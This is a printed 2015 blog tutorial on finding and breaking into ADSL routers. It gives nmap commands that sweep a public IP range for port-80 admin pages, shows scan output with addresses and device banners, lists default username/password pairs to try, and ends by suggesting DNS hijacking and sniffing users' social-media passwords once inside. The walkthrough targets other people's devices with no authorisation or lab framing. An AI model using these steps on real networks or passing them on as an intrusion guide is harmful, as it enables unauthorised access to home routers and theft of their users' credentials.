8/3/15, 12:26 AM Exploit ADSL router using NMAP • HaCoder Page 1 of 10 http://www.hacoder.com/2015/08/exploit-adsl-router-using-nmap/ By Ibrahim - Aug 1, 2015 Exploit ADSL router using NMAP Search for Vulnerable Routers
8/3/15, 12:26 AMExploit ADSL router using NMAP • HaCoder
Page 1 of 10http://www.hacoder.com/2015/08/exploit-adsl-router-using-nmap/
By Ibrahim - Aug 1, 2015
Exploit ADSL router using NMAP
Search for Vulnerable Routers
8/3/15, 12:26 AMExploit ADSL router using NMAP • HaCoder
Page 2 of 10http://www.hacoder.com/2015/08/exploit-adsl-router-using-nmap/
Now that we have NMAP sorted, we are going to run the following command to scan for ADSL Modem Routers
based on their Banner on Port 80 to start our ADSL router hack. All you need is to pick an IP range. I’ve used
an example below using 101.53.64.1/24 range.
Search from Linux using command Line
In Linux run the following command:
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG – | grep ‘open’ | grep -v ‘tcpwrapped’
In Windows or Mac open NMAP and copy paste this line:
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG –
Once it finds the results, search for the word ‘open’ to narrow down results. A typical Linux NMAP command
would return outputs line below: (and of course I’ve changed the IP details)
8/3/15, 12:26 AMExploit ADSL router using NMAP • HaCoder
Page 3 of 10http://www.hacoder.com/2015/08/exploit-adsl-router-using-nmap/
Host: 101.53.64.3 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.4 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.9 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.19 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.20 () Ports: 80/open/tcp//http//Fortinet VPN|firewall http config/
Host: 101.53.64.23 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.31 () Ports: 80/open/tcp//http?///
Host: 101.53.64.33 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.35 () Ports: 80/open/tcp//http?///
Host: 101.53.64.37 () Ports: 80/open/tcp//http?///
Host: 101.53.64.49 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: 101.53.64.52 () Ports: 80/open/tcp//http?///
Host: 101.53.64.53 () Ports: 80/open/tcp//ssl|http//thttpd/
Host: 101.53.64.58 () Ports: 80/open/tcp//http?///
Host: 101.53.64.63 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.69 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: 101.53.64.73 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.79 () Ports: 80/open/tcp//http//Apache httpd/
Host: 101.53.64.85 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.107 () Ports: 80/open/tcp//http?///
Host: 101.53.64.112 () Ports: 80/open/tcp//http?///
Host: 101.53.64.115 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.123 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.129 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.135 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.145 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.149 () Ports: 80/open/tcp//http//Microsoft IIS httpd 6.0/
Host: 101.53.64.167 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.170 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.186 () Ports: 80/open/tcp//http?///
Host: 101.53.64.188 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.193 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.202 () Ports: 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/
Host: 101.53.64.214 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.224 () Ports: 80/open/tcp//http//Allegro RomPager 4.51 UPnP|1.0 (ZyXEL ZyWALL 2)/
8/3/15, 12:26 AMExploit ADSL router using NMAP • HaCoder
Page 4 of 10http://www.hacoder.com/2015/08/exploit-adsl-router-using-nmap/
This was taking a long time (we are after all try to scan 256 hosts using the command above). Me being just
impatient, I wanted to check if my Kali Linux was actually doing anything to ADSL router hack. I used the
following command in a separate Terminal to monitor what my PC was doing… it was doing a lot …
tcpdump -ni eth0
That’s a lot of connected hosts with TCP Port 80 open. Some got ‘tcpwrapped’ marked on them. It means
they are possibly not accessible.
Search from Windows, Mac or Linux using GUI – NMAP or Zenmap
8/3/15, 12:26 AMExploit ADSL router using NMAP • HaCoder
Page 5 of 10http://www.hacoder.com/2015/08/exploit-adsl-router-using-nmap/
Assuming you got NMAP installation sorted, you can now open NMAP (In Kali Linux or similar Linux distro,
you can use Zenmap which is GUI version of NAMP cross platform). Copy paste the following line in
Command field
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/26 -p80 -oG –
another version of this command is using different representation of Subnet MASK.
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG –
Press SCAN Button and wait few minutes till the scan is over.
8/3/15, 12:26 AMExploit ADSL router using NMAP • HaCoder
Page 6 of 10http://www.hacoder.com/2015/08/exploit-adsl-router-using-nmap/
Once you have some results, then you need to find the open devices with open ports. In search Result page:
1. Click on Services Button
2. Click on http Service
3. Click on Ports/Hosts TAB (Twice to sort them by status)
As you can see, I’ve found a few devices with open http port 80.
8/3/15, 12:26 AMExploit ADSL router using NMAP • HaCoder
Page 7 of 10http://www.hacoder.com/2015/08/exploit-adsl-router-using-nmap/
It is quite amazing how many devices got ports open facing outer DMZ.
Access Management Webpage
Pick one at a time. For example try this:
http://101.53.64.3
http://101.53.64.4
8/3/15, 12:26 AMExploit ADSL router using NMAP • HaCoder
Page 8 of 10http://www.hacoder.com/2015/08/exploit-adsl-router-using-nmap/
http://101.53.64.129
You get the idea. If it opens a webpage asking for username and password, try one of the following
combinations:
admin/adminadmin/passwordadmin/passadmin/secret
If you can find the Router’s model number and make, you can find exact username and password from this
webpage: http://portforward.com/default_username_password/ Before we finish up, I am sure you were
already impatient like me as a lot of the routers had ‘tcpwrapped’ on them which was actually stopping us
from accessing the web management interface to ADSL router hack. Following command will exclude those
devices from our search. I’ve also expanded my search to a broader range using a slightly different Subnet
MASK.
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/22 -p80 -oG – | grep ‘open’ | grep -v ‘tcpwrapped’
In this command I am using /22 Subnet Mask with 2 specific outputs: I am looking for the work ‘open’ and
excluding ‘tcpwrapped’ on my output. As you can see, I still get a lot of outputs.
8/3/15, 12:26 AMExploit ADSL router using NMAP • HaCoder
Page 9 of 10http://www.hacoder.com/2015/08/exploit-adsl-router-using-nmap/
Conclusion
You’ll be surprised how many have default username and passwords enabled. Once you get your access to
the router, you can do a lot more, like DNS hijacking, steal username and passwords (for example: Social
Media username passwords (FaceBook, Twitter, WebMail etc.)) using tcpdump/snoop on router’s interface and
many more using ADSL router hack.
Also read: Scanning Joomla For Vulnerabilities with Kali Linux
For more updates and interesting stories from Hacoder, subscribe to our newsletter.
8/3/15, 12:26 AMExploit ADSL router using NMAP • HaCoder
Page 10 of 10http://www.hacoder.com/2015/08/exploit-adsl-router-using-nmap/
Enter your email address:
Subscribe
Ibrahim
http://www.hacoder.com/
Ibrahim Husic is a young Information Systems Security Engineer. He started with penetration testing when
he was 16 years old. It all started with Kali linux and Metasploit. He was two times in newspaper for
hacking. In free time he investigates security holes and solves them.
! " # $ % & '